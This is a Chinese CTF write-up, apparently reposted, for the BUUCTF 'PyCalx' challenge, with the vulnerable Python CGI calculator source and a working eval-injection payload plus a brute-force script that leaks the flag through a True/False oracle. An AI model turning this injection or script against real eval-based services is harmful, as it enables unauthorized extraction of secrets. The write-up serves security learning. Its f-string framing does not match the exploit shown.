[buuctf]了解Python 3F字符串格式字符串漏洞和web问题中的eval注入,BUUCTF,从,学习,Python3fstring,格式化,与

发表时间:2020-10-22

前言:
前几天刚刚在网上看到p师傅分享的python的f

代码审计

在这里插入图片描述
然后看到有个source,点开看到一堆源码,关于什么是cgi下面有个菜鸟的链接可以看看

#!/usr/bin/env python3
import cgi;
import sys
from html import escape

FLAG = open('/var/www/flag','r').read()

OK_200 = """Content-type: text/html

<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
<center>
<title>PyCalx</title>
<h1>PyCalx</h1>
<form>
<input class="form-control col-md-4" type=text name=value1 placeholder='Value 1 (Example: 1  abc)' autofocus/>
<input class="form-control col-md-4" type=text name=op placeholder='Operator (Example: + - * ** / // == != )' />
<input class="form-control col-md-4" type=text name=value2 placeholder='Value 2 (Example: 1  abc)' />
<input class="form-control col-md-4 btn btn-success" type=submit value=EVAL />
</form>
<a href='?source=1'>Source</a>
</center>
"""

print(OK_200)
arguments = cgi.FieldStorage()

if 'source' in arguments:
    source = arguments['source'].value
else:
    source = 0

if source == '1':
    print('<pre>'+escape(str(open(__file__,'r').read()))+'</pre>')

if 'value1' in arguments and 'value2' in arguments and 'op' in arguments:

    def get_value(val):
        val = str(val)[:64]
        if str(val).isdigit(): return int(val)
        blacklist = ['(',')','[',']','\'','"'] # I don't like tuple, list and dict.
        if val == '' or [c for c in blacklist if c in val] != []:
            print('<center>Invalid value</center>')
            sys.exit(0)
        return val

    def get_op(val):
        val = str(val)[:2]
        list_ops = ['+','-','/','*','=','!']
        if val == '' or val[0] not in list_ops:
            print('<center>Invalid op</center>')
            sys.exit(0)
        return val

    op = get_op(arguments['op'].value)
    value1 = get_value(arguments['value1'].value)
    value2 = get_value(arguments['value2'].value)

    if str(value1).isdigit() ^ str(value2).isdigit():
        print('<center>Types of the values don\'t match</center>')
        sys.exit(0)

    calc_eval = str(repr(value1)) + str(op) + str(repr(value2))

    print('<div class=container><div class=row><div class=col-md-2></div><div class="col-md-8"><pre>')
    print('>>>> print('+escape(calc_eval)+')')

    try:
        result = str(eval(calc_eval))
        if result.isdigit() or result == 'True' or result == 'False':
            print(result)
        else:
            print("Invalid") # Sorry we don't support output as a string due to security issue.
    except:
        print("Invalid")


    print('>>> </pre></div></div></div>')

代码审计完以后大致意思如下:

cgi会处理source,value1,value2,op四个参数。 如果source=1则打印源代码。
value1,value2,op三个参数都有值时进一步处理。 value1,value2至少1个字符,至多64个,且不包含黑名单中出现的字符
op至少1个字符,至多2个,且首字符必须在白名单±*/=! 里。
value1,value2要么都是只包含[0-9],要么都包含其他字符。 执行str(eval(str(repr(value1)) +
str(op) + str(repr(value2)))) ,且只有结果是bool值或只包含[0-9] 时才会输出。

注:repr返回对象的可打印形式,和反引号包裹效果一致,对大多数类型,他会返有一个字符串,使其可以作为代码直接传入eval执行。
在这里我们应该知道 repr 函数是干嘛的
repr() 函数将对象转化为供解释器读取的形式。 -----来自菜鸟教程
在这里插入图片描述

利用姿势

因为 get_value 过滤的存在,这里无法直接通过 value1 , value2 引入单引号进行单引号逃逸。

但是因为get_op仅仅过滤验证了第一位字符,因此我们可以在第二位引入单引号。 value1=z value2=z op=+'

’ z ’ + ’ ’ z ’

这时候进入eval肯定会因为语法报错,因为括号的不匹配,这时候修改 value2=#z ,可以注释后面的单引号,逃逸出了单引号,但是仍然无法直接打印出Flag,因为页面返回必须满足 数字 , True Flase 这三种形式才会有回显,看了网上的wp知道是利用bool类型来猜解, source 赋值使用后仍然存在,是我们的可控点,且无过滤函数,我们可以通过它配合 in 进行猜解 Flag ,猜解成功页面返回 True ,错误则返回 Flase
这样我们就可以利用f-string的特性来得到flag啦

import requests
url="url/cgi-bin/pycalx.py?value1=f&op=%2b'&value2=+and+True+and+source+in+FLAG%23&source="
s='abcdefghijkmnlopqrstuvwxyz0123456789-{}'
flag='fl'
for a in range(50):
    for i in s:
        r=requests.get(url=url+flag+i).text
        print(url+flag+i)
        if 'False'  not in r:
            print(flag)
            flag+=i
            break

参考链接

Python 格式化字符串漏洞(Django为例)
Python CGI编程

文章来源互联网,如有侵权,请联系管理员删除。邮箱:417803890@qq.com / QQ:417803890

微配音

Python Free

邮箱:417803890@qq.com
QQ:417803890

皖ICP备19001818号
© 2019 copyright www.pythonf.cn - All rights reserved

微信扫一扫关注公众号:

联系方式

Python Free